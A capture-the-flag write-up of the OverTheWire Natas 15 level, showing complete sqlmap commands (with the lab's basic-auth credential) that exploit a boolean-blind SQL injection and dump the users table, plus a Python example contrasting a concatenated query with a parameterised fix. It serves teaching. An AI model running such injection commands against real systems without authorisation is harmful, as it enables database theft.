Natas 15 — SQL Injection with SQLMap

Miguel Sampaio da Veiga
Published in Hacker Toolbelt
Jun 17, 2019

This is part… I’m not doing this part thing. All of the Natas levels are numbered, so this is Natas 15 and that’s that. Now that we have the naming out of the way, let’s dive in.

Opening natas15 we’re greeted with a form:

Let’s try natas15… “The user doesn’t exist”. What about natas16?

This level is, like Natas 14, an injection level. But this time we do not get the SQL result back, even if we pass a debug param to see the query sent to MySQL.

Looking at the source code, we find there is a users table. We just need to tamper with the params and their values to crack this level.

So, first things first. Open OWASP ZAP and add a debug param to get the query, just like in Natas 14:

OK, we got a response, but unlike Natas 14 the response is always just a “This user exists” message, with no query output.

It’s time to use one of the best tools in our toolbelt when dealing with SQL injection: SQLMap. I’ve written a cheat sheet for SQLMap, available here. SQLMap is a fantastic command-line tool. I recommend taking a moment to visit the homepage and star the GitHub project.

Back to our hack. Open a terminal window and type:

$ sqlmap --help

I’m not covering the installation of the tool. I’m assuming you use a security distro like Kali or Parrot, which ship with sqlmap installed.

Our SQLMap command with the parameters will look like:

$ sqlmap -u "http://natas15.natas.labs.overthewire.org/index.php?debug" --proxy=http://127.0.0.1:8080 --string="This user exists" --auth-type=Basic --auth-cred=natas15:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J --data "username=natas16"

Let’s break it into pieces:

  • -u "http://natas15.natas.labs.overthewire.org/index.php?debug": the URL of our target
  • --proxy=http://127.0.0.1:8080: we’ll route all sqlmap traffic through ZAP
  • --string="This user exists": string to match when the query evaluates to True
  • --auth-type=Basic: HTTP authentication type
  • --auth-cred=natas15:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J: natas15 credentials
  • --data "username=natas16": our param

Let’s add the risk and level params:

$ sqlmap -u "http://natas15.natas.labs.overthewire.org/index.php?debug" --proxy=http://127.0.0.1:8080 --string="This user exists" --auth-type=Basic --auth-cred=natas15:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J --data "username=natas16" --level=5 --risk=3

Good news: the app is vulnerable. From the source code we know the data we’re after is stored in a MySQL DBMS: the database is ‘natas15’, the table is ‘users’, and the column is ‘password’. Just add the enumeration params to the command:

$ sqlmap -u "http://natas15.natas.labs.overthewire.org/index.php?debug" --proxy=http://127.0.0.1:8080 --string="This user exists" --auth-type=Basic --auth-cred=natas15:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J --data "username=natas16" --level=5 --risk=3 -D natas15 -T users -C username,password --dump
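To see what the --string option is keying on, here is an added example (not from the post and not the real Natas source): a constructed in-memory SQLite stand-in for the users table, where a string-concatenated lookup turns the “This user exists” message into a one-bit true/false oracle, beside a parameterised lookup that answers the same payloads identically. The table contents, password value and function names are all made up for the example.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the level's users table (not the real natas15
    database; the password value is a placeholder, not a real flag)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('natas16', 'PLACEHOLDER-NOT-A-REAL-PASSWORD')")
    return db


def user_exists_vulnerable(db, username):
    """Vulnerable pattern: the username is pasted into the SQL text, so quote
    characters in it change the query's logic. The page only reveals whether
    any row matched, which is exactly what a boolean-blind injection needs."""
    query = "SELECT * FROM users WHERE username='" + username + "'"
    try:
        rows = db.execute(query).fetchall()
    except sqlite3.Error:
        return False  # malformed SQL: treat as "user doesn't exist"
    return len(rows) > 0  # True -> "This user exists"


def user_exists_fixed(db, username):
    """Hardened pattern: the value is bound as a parameter, never parsed as
    SQL, so the whole input is compared literally against the column."""
    rows = db.execute("SELECT * FROM users WHERE username=?", (username,)).fetchall()
    return len(rows) > 0


def oracle_leaks(check, db):
    """True if two payloads that differ only in an attacker-chosen condition
    get different answers, i.e. the existence message leaks one bit per
    request. sqlmap's --string match is watching for exactly this."""
    always_true = "natas16' AND '1'='1"
    always_false = "natas16' AND '1'='2"
    return check(db, always_true) != check(db, always_false)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable lookup leaks:", oracle_leaks(user_exists_vulnerable, db))  # True
    print("parameterised lookup leaks:", oracle_leaks(user_exists_fixed, db))  # False
```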

There’s our prize. See you in Natas 16.
